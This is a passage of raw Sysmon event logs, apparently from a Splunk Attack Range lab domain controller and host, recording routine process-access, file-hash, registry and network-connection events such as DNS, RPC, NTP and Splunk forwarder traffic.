16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061158Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061157Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061156Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061155Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061154Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061153Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061152Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061151Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061150Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061149Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061148Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061147Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.388{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000245898Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:31.005{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD9ED17AD17E0D3CC5A16DDE2473F8E3,SHA256=4B830AE5AD73778241747E623022A7DF82FFAB192298C39FC8CB9773EE38A3D1,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001061181Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-SetValue2021-03-30 16:29:32.467{7F8C56E7-4E3C-6063-1000-00000000AF01}100C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72581-0xdd4f0a69) 23542300x80000000000000001061180Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.107{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21AA49B04BF87F536D77B962F7B12BED,SHA256=B5865147D5CD20A6ACBCDF608E9D8CEB58713BA397B15965BDBD3E2D5B2498CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245899Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:32.005{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D69A27C99A1B7494F2E6BADB3853F16,SHA256=5C62ADA45C49F598475F7832DC93D3CABC563E5F6EF804F382058932A818F58D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061187Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:33.467{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B8E968F82647AF77B2550DA0D3A94D82,SHA256=138FA0548B01130B3C0485BF09AB2477AA3620ADCA5EA1B28A884F378FBD183B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061186Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:33.467{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F462C2B7C7A45B4C9FB43C495A213EC4,SHA256=8E916416B5000D64605327DCD51255E0D806279020ED1715CA0FBCF3F813ED82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061185Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:33.467{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC4CB0623A4BBB3A1275BD1CF9DAC068,SHA256=5EBA24F3B2D20663814C363154F93C84DACC7A31DBCFEFF4A2A87F16BF5C9C78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061184Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:33.467{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=57C2991FC6CBA80040C66C130CFBB4C6,SHA256=AD85B8ECEF3D59B05C3BFF1BE35DA79075CCE1B2BED634A5492F47A68C15A633,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061183Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:29.406{7F8C56E7-4E39-6063-0100-00000000AF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local54808-truefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local445microsoft-ds 354300x80000000000000001061182Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:29.406{7F8C56E7-4E39-6063-0100-00000000AF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local54808-truefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local445microsoft-ds 23542300x8000000000000000245900Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:33.005{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F79474C21E4F7B8996F55E4FB716693F,SHA256=7F49E6F1221D58BB35CD7028ACEFCB94B5B5F5F4CF62D23658CA667D5DB6D6B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061213Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:34.873{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B53A23DF5883E6C5E7C16F89168D8D5B,SHA256=CA481AABB4AAB9D50AE52712FBD05C8F8C702D765F9D096B5BE8331493E9E932,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061212Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.548{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local49912- 354300x80000000000000001061211Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.547{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-877.attackrange.local53domainfalse10.0.1.14win-dc-877.attackrange.local65151- 354300x80000000000000001061210Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.543{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local59023- 354300x80000000000000001061209Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.543{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local59201- 354300x80000000000000001061208Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.543{7F8C56E7-4E3C-6063-1400-00000000AF01}1040C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local59201-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domain 354300x80000000000000001061207Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.542{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local50313- 354300x80000000000000001061206Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.541{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54071- 354300x80000000000000001061205Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.540{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-877.attackrange.local53domainfalse10.0.1.14win-dc-877.attackrange.local50537- 354300x80000000000000001061204Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.540{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54984- 354300x80000000000000001061203Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.539{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-877.attackrange.local53domainfalse10.0.1.14win-dc-877.attackrange.local65127- 354300x80000000000000001061202Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.538{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local52557- 354300x80000000000000001061201Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.537{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-877.attackrange.local53domainfalse10.0.1.14win-dc-877.attackrange.local50481- 354300x80000000000000001061200Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.537{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local59181- 354300x80000000000000001061199Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.536{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-877.attackrange.local53domainfalse10.0.1.14win-dc-877.attackrange.local58463- 354300x80000000000000001061198Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.535{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local65185- 354300x80000000000000001061197Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.534{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-877.attackrange.local53domainfalse10.0.1.14win-dc-877.attackrange.local50051- 354300x80000000000000001061196Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.534{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-877.attackrange.local50051-false10.0.1.14win-dc-877.attackrange.local53domain 354300x80000000000000001061195Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.534{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local65127- 354300x80000000000000001061194Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.534{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local65127-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domain 354300x80000000000000001061193Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.529{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local54811-truefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local49666- 354300x80000000000000001061192Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.529{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local54811-truefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local49666- 354300x80000000000000001061191Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.528{7F8C56E7-4E3C-6063-0D00-00000000AF01}892C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local54810-truefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local135epmap 354300x80000000000000001061190Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.528{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local54810-truefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local135epmap 354300x80000000000000001061189Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:31.230{7F8C56E7-4E3C-6063-1000-00000000AF01}100C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-877.attackrange.local123ntpfalse13.86.101.172-123ntp 354300x80000000000000001061188Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:30.949{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54809-false10.0.1.12-8000- 23542300x8000000000000000245901Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:34.005{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFEF65C739CE7F8B34789AA9EE3FBB52,SHA256=D48E7F1587ACE0570E9179440D555CAB0D22362DB1A71AE29A98D5E1CB91F499,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061232Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:35.545{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E2340F97A332B82CF779E63C79A0208,SHA256=E7DB272E0CF923707B72D7E1A4ECBE37953C4E407C95BBAC5E7E439F5809D14B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061231Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.565{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local60082- 354300x80000000000000001061230Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 